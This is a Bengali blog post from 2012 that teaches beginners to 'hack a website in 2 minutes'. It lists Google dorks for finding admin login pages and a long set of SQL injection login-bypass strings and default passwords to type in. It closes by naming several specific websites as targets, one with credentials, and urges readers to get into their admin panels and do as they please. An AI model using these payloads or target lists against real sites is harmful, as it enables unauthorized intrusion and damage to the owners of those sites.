সোমবার, ১৮ জুন, ২০১২

২ মিনিটে হ্যাক করুন ওয়েবসাইট

২ মিনিটে হ্যাক করুন ওয়েবসাইট। না দেখলে মিস করবেন *নতুনদের জন্য* 
আসুন শিখে ফেলি কিভাবে 2 মিনিটে একটা ওয়েবসাইট হ্যাক করতে হয়।

প্রথমে মামার কাছে যান… www.google.com এ।
এবার Search করুন নিচের থেকে যে কোন একটা Google dork লিখে।
আপনাদের জন্য আমি কিছু SQL injection Dork দিলাম 

“inurl:admin.asp” 

“inurl:adminlogin.php”
“inurl:adminhome.php”
“inurl:admin_login.php”

“inurl:admin/login.asp”

“inurl:adminlogin.asp”
“inurl:adminhome.asp”
“inurl:admin_login.asp”
“inurl:administratorlogin.asp”
“inurl:login/administrator.asp”
“inurl:administrator_login.asp”
“inurl:admin.php”
“inurl:login/admin.php”
“inurl:admin/login.php”
“inurl:administratorlogin.php”
“inurl:login/administrator.php”
“inurl:administrator_login.php”

এবার সার্চ দিন। তাহলে অনেক গুলো ফলাফল পাবেন।
যদি ইন্দিয়ার সাইট খুজতে চান তাহলে dork এর আগে লিখুন ইন্ডিয়া। যেমন india”inurl:adminlogin.asp”
যে কোন একটি সাইটে প্রবেশ করুন।
এখানে username দিনঃ Admin
তারপর নিচের থেকে যেকোনো একটা পাসওয়ার্ড দিন।

'or'1'='1 admin admin123 admin1234 ' or '1'='1

' or 'x'='x

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1-- 

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 -- 

'or'1=1' 

তাহলে আপনার লগইন form হবে নিচের মত

username:Admin 

password:'or'1'='1

মনে রাখবেন যে বেশির ভাগ সাইট এর পাসওয়ার্ড হয় ‘or’1=1′ এবং admin

আর যে সাইট গুলো valuable ওই সাইট গুলো হ্যাক করতে পারবেন। 

আপনাদের জন্য কিছু সাইট দিলাম । এবার আপনারা অ্যাডমিন প্যানেল এ যান এবং যা ইচ্ছা করতে পারেন। 
1.http://www.amskrupajal.org/adminlogin.asp
user: admin
pass: ‘or”=’
2.www.lhhb.com/admin/login.asp
3.www.udesa.co.za/admin/login.asp
4.http://www.krupajalgroup.org/AdminLogin.asp
এখন ইচ্ছা মত সাইট হ্যাক করুন। ভাল থাকবেন সবাই।

1 টি মন্তব্য: